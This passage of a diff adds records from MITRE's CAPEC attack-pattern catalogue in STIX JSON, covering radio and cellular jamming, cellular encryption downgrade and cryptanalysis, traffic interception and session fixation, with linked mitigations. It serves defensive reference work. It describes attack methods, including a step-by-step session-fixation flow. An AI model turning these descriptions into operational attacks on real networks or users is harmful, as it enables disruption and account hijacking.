"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses radio noise or signals in an attempt to disrupt communications. 
By intentionally overwhelming system resources with illegitimate traffic, service is denied to the legitimate traffic of authorized users.", + "external_references": [ + { + "external_id": "CAPEC-601", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/601.html" + } + ], + "id": "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_consequences": { + "Availability": [ + "Other (The jamming of equipment denies the availability of functioning communications services.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--7a6e0e5c-f18e-4612-aaa6-68bdeb378b31", + "attack-pattern--bac3d2d8-864c-4519-8e16-6d4e4fee6031", + "attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-602", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--2fb09678-092a-490d-b2da-fff20a696219", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Degradation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary blocks the delivery of an important system resource causing the system to fail or stop working.", + "external_references": [ + { + "external_id": "CAPEC-603", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/603.html" + } + ], + "id": "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Blockage", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Blocking a resource from functional operation denies its availability to authorized users.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "attack-pattern--5c216971-78b5-4ac1-9cbe-f46fe1c632d1", + "attack-pattern--807e5b36-9da9-4be8-9f6e-5d8c7258cff5" + ], + "x_capec_prerequisites": [ + "This attack pattern requires knowledge of where important system resources are logically located as well as how they operate." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker actively transmits on the Wi-Fi channel to prevent users from transmitting or receiving data from the targeted Wi-Fi network. There are several known techniques to perform this attack – for example: the attacker may flood the Wi-Fi access point (e.g. the retransmission device) with deauthentication frames. 
Another method is to transmit high levels of noise on the RF band used by the Wi-Fi network.", + "external_references": [ + { + "external_id": "CAPEC-604", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/604.html" + } + ], + "id": "attack-pattern--bac3d2d8-864c-4519-8e16-6d4e4fee6031", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Wi-Fi Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a" + ], + "x_capec_consequences": { + "Availability": [ + "Other (A successful attack will deny the availability of the Wi-fi network to authorized users.)", + "Resource Consumption (The attacker's goal is to prevent users from accessing the wireless network. Denying connectivity to the wireless network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Lack of anti-jam features in 802.11", + "Lack of authentication on deauthentication/disassociation packets on 802.11-based networks" + ], + "x_capec_skills_required": { + "Low": "This attack can be performed by low capability attackers with freely available tools. Commercial tools are also available that can target select networks or all WiFi networks within a range of several miles." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Countermeasures have been proposed for both disassociation flooding and RF jamming, however these countermeasures are not standardized and would need to be supported on both the retransmission device and the handset in order to be effective. Commercial products are not currently available that support jamming countermeasures for Wi-Fi.", + "id": "course-of-action--60934a01-b877-4253-9984-be3bf3629ab7", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-604-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--52128fa2-afdb-4097-bdd6-8f3b3095fc56", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60934a01-b877-4253-9984-be3bf3629ab7", + "target_ref": "attack-pattern--bac3d2d8-864c-4519-8e16-6d4e4fee6031", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker actively transmits signals to overpower and disrupt the communication between a cellular user device and a cell tower. Several existing techniques are known in the open literature for this attack for 2G, 3G, and 4G LTE cellular technology. 
For example, some attacks target cell towers by overwhelming them with false status messages, while others introduce high levels of noise on signaling channels.", + "external_references": [ + { + "external_id": "CAPEC-605", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/605.html" + } + ], + "id": "attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Cellular Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (The attacker's goal is to prevent users from accessing the cellular network. Denying connectivity to the cellular network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_prerequisites": [ + "Lack of anti-jam features in cellular technology (2G, 3G, 4G, LTE)" + ], + "x_capec_skills_required": { + "Low": "This attack can be performed by low capability attackers with commercially available tools." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Mitigating this attack requires countermeasures employed on both the retransmission device as well as on the cell tower. Therefore, any system that relies on existing commercial cell towards will likely be vulnerable to this attack. 
By using a private cellular LTE network (i.e., a custom cell tower), jamming countermeasures could be developed and employed.", + "id": "course-of-action--5afa1aa9-7585-4544-991c-9152f9024393", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-605-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--10c74aec-704c-47cf-ae7a-7f2c590c4166", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5afa1aa9-7585-4544-991c-9152f9024393", + "target_ref": "attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker, with control of a Cellular Rogue Base Station or through cooperation with a Malicious Mobile Network Operator can force the mobile device (e.g., the retransmission device) to use no encryption (A5/0 mode) or to use easily breakable encryption (A5/1 or A5/2 mode).", + "external_references": [ + { + "external_id": "CAPEC-606", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/606.html" + }, + { + "external_id": "CWE-757", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/757.html" + } + ], + "id": "attack-pattern--4480b2e7-bdb7-45fe-896b-dd895fbe3680", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Weakening of Cellular Encryption", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + 
"attack-pattern--e680008c-a642-4feb-a1c4-a29b54eb284a" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Tracking, Network Reconnaissance)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "Cellular devices that allow negotiating security modes to facilitate backwards compatibility and roaming on legacy networks." + ], + "x_capec_skills_required": { + "Medium": "Adversaries can purchase and implement rogue BTS stations at a cost effective rate, and can push a mobile device to downgrade to a non-secure cellular protocol like 2G over GSM or CDMA." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of hardened baseband firmware on retransmission device to detect and prevent the use of weak cellular encryption.", + "id": "course-of-action--a04126f1-f0a0-4aa1-99e0-711b2d3e96d7", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-606-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9467c544-8557-428f-9ebe-8a1fcc52a7f9", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a04126f1-f0a0-4aa1-99e0-711b2d3e96d7", + "target_ref": "attack-pattern--4480b2e7-bdb7-45fe-896b-dd895fbe3680", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor cellular RF interface to detect the usage of 
weaker-than-expected cellular encryption.", + "id": "course-of-action--f0d5b9cf-bcc9-4462-a783-d4e7f17ceada", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-606-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--913cda1e-62b6-4e54-9557-3e3626768a59", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0d5b9cf-bcc9-4462-a783-d4e7f17ceada", + "target_ref": "attack-pattern--4480b2e7-bdb7-45fe-896b-dd895fbe3680", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker obstructs the interactions between system components. By interrupting or disabling these interactions, an adversary can often force the system into a degraded state or cause the system to stop working as intended. 
This can cause the system components to be unavailable until the obstruction mitigated.", + "external_references": [ + { + "external_id": "CAPEC-607", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/607.html" + } + ], + "id": "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Obstruction", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--61546d1a-d720-4609-89ca-12039268d502" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Communications", + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--475af086-5223-4210-910a-5217445c0c23", + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8", + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a", + "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The use of cryptanalytic techniques to derive cryptographic keys or otherwise effectively defeat cellular encryption to reveal traffic content. Some cellular encryption algorithms such as A5/1 and A5/2 (specified for GSM use) are known to be vulnerable to such attacks and commercial tools are available to execute these attacks and decrypt mobile phone conversations in real-time. Newer encryption algorithms in use by UMTS and LTE are stronger and currently believed to be less vulnerable to these types of attacks. 
Note, however, that an attacker with a Cellular Rogue Base Station can force the use of weak cellular encryption even by newer mobile devices.", + "external_references": [ + { + "external_id": "CAPEC-608", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/608.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + } + ], + "id": "attack-pattern--9dded599-dd66-4a4c-8f17-6afb81c234f8", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Cryptanalysis of Cellular Encryption", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Reveals IMSI and IMEI for tracking of retransmission device and enables further follow-on attacks by revealing black network control messages. (e.g., revealing IP addresses of enterprise servers for VOIP connectivity))" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Medium": "Adversaries can rent commercial supercomputer time globally to conduct cryptanalysis on encrypted data captured from mobile devices. Foreign governments have their own cryptanalysis technology and capabilities. Commercial cellular standards for encryption (GSM and CDMA) are also subject to adversary cryptanalysis." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--75de4a67-623a-4c5a-a757-9f143a48b1d9", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a04126f1-f0a0-4aa1-99e0-711b2d3e96d7", + "target_ref": "attack-pattern--9dded599-dd66-4a4c-8f17-6afb81c234f8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56a59dd2-1721-46b2-84d7-cdcd15e06ca7", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0d5b9cf-bcc9-4462-a783-d4e7f17ceada", + "target_ref": "attack-pattern--9dded599-dd66-4a4c-8f17-6afb81c234f8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Cellular traffic for voice and data from mobile devices and retransmission devices can be intercepted via numerous methods. Malicious actors can deploy their own cellular tower equipment and intercept cellular traffic surreptitiously. 
Additionally, government agencies of adversaries and malicious actors can intercept cellular traffic via the telecommunications backbone over which mobile traffic is transmitted.", + "external_references": [ + { + "external_id": "CAPEC-609", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/609.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Multi-Factor Authentication Interception", + "external_id": "T1111", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1111" + } + ], + "id": "attack-pattern--c7f0c73b-fe94-49c9-89bb-a3ec4441e4ee", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cellular Traffic Intercept", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Capture all cellular and RF traffic from mobile and retransmission devices. Move bulk traffic capture to storage area for cryptanalysis of encrypted traffic, and telemetry analysis of non-encrypted data. (packet headers, cellular power data, signal strength, etc.))" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Medium": "Adversaries can purchase hardware and software solutions, or create their own solutions, to capture/intercept cellular radio traffic. The cost of a basic Base Transceiver Station (BTS) to broadcast to local mobile cellular radios in mobile devices has dropped to very affordable costs. The ability of commercial cellular providers to monitor for \"rogue\" BTS stations is poor in many areas and it is assumed that \"rogue\" BTS stations exist in urban areas." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encryption of all data packets emanating from the smartphone to a retransmission device via two encrypted tunnels with Suite B cryptography, all the way to the VPN gateway at the datacenter.", + "id": "course-of-action--c7b42679-6d45-41dc-b732-6310e2569805", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-609-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c4813a8a-b41c-4718-8323-0bdb7fabf19c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c7b42679-6d45-41dc-b732-6310e2569805", + "target_ref": "attack-pattern--c7f0c73b-fe94-49c9-89bb-a3ec4441e4ee", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The attacker induces a client to establish a session with the target software using a session identifier provided by the attacker. Once the user successfully authenticates to the target software, the attacker uses the (now privileged) session identifier in their own transactions. 
This attack leverages the fact that the target software either relies on client-generated session identifiers or maintains the same session identifiers after privilege elevation.", + "external_references": [ + { + "external_id": "CAPEC-61", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/61.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Session Fixation", + "external_id": "37", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Session-Fixation" + }, + { + "description": "Session fixation", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Session_fixation" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-601", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/03-Testing_for_Session_Fixation.html" + } + ], + "id": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Session Fixation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_child_of_refs": [ + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider a banking application that issues a session identifier in the URL to a user before login, and uses the same identifier to identify the customer following successful authentication. An attacker can easily leverage session fixation to access a victim's account by having the victim click on a forged link that contains a valid session identifier from a trapped session setup by the attacker. 
Once the victim is authenticated, the attacker can take over the session and continue with the same levels of privilege as the victim.", + "An attacker can hijack user sessions, bypass authentication controls and possibly gain administrative privilege by fixating the session of a user authenticating to the Management Console on certain versions of Macromedia JRun 4.0. This can be achieved by setting the session identifier in the user's browser and having the user authenticate to the Management Console. Session fixation is possible since the application server does not regenerate session identifiers when there is a change in the privilege levels. See also: CVE-2004-2182" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Setup the Attack: Setup a session: The attacker has to setup a trap session that provides a valid session identifier, or select an arbitrary identifier, depending on the mechanism employed by the application. A trap session is a dummy session established with the application by the attacker and is used solely for the purpose of obtaining valid session identifiers. The attacker may also be required to periodically refresh the trap session in order to obtain valid session identifiers.

  2. Techniques
    The attacker chooses a predefined identifier that they know.
    The attacker creates a trap session for the victim.

Experiment

  1. Attract a Victim: Fixate the session: The attacker now needs to transfer the session identifier from the trap session to the victim by introducing the session identifier into the victim's browser. This is known as fixating the session. The session identifier can be introduced into the victim's browser by leveraging cross site scripting vulnerability, using META tags or setting HTTP response headers in a variety of ways.

  2. Techniques
    Attackers can put links on web sites (such as forums, blogs, or comment forms).
    Attackers can establish rogue proxy servers for network protocols that give out the session ID and then redirect the connection to the legitimate service.
    Attackers can email attack URLs to potential victims through spam and phishing techniques.

Exploit

  1. Abuse the Victim's Session: Takeover the fixated session: Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the fixated session identifier.

  2. Techniques
    The attacker loads the predefined session ID into their browser and browses to protected data or functionality.
    The attacker loads the predefined session ID into their software and utilizes functionality with the rights of the victim.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Session identifiers that remain unchanged when the privilege levels change.", + "Permissive session management mechanism that accepts random user-generated session identifiers", + "Predictable session identifiers" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Only basic skills are required to determine and fixate session identifiers in a user's browser. Subsequent attacks may require greater skill levels depending on the attackers' motives." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a strict session management mechanism that only accepts locally generated session identifiers: This prevents attackers from fixating session identifiers of their own choice.", + "id": "course-of-action--b187831e-a53c-465d-b72f-49df78479e67", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-61-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0d553a19-deeb-45df-b70d-71110b119c7c", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b187831e-a53c-465d-b72f-49df78479e67", + "target_ref": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.", + "id": "course-of-action--606914b1-f22c-4598-a173-6f4546572979", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-61-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ad81b2e4-63b4-4d8e-9d96-4db93943afa2", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--606914b1-f22c-4598-a173-6f4546572979", + "target_ref": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use session identifiers that are difficult to guess or brute-force: One way for the attackers to obtain valid session identifiers is by brute-forcing or guessing them. 
By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.", + "id": "course-of-action--8fc9e23c-7780-4d34-8bd6-01ec3f063b9c", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-61-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6ee9dff-2bc5-4eae-a4d6-b3f868cb8569", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fc9e23c-7780-4d34-8bd6-01ec3f063b9c", + "target_ref": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries inject data into mobile technology traffic (data flows or signaling data) to disrupt communications or conduct additional surveillance operations.", + "external_references": [ + { + "external_id": "CAPEC-610", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/610.html" + } + ], + "id": 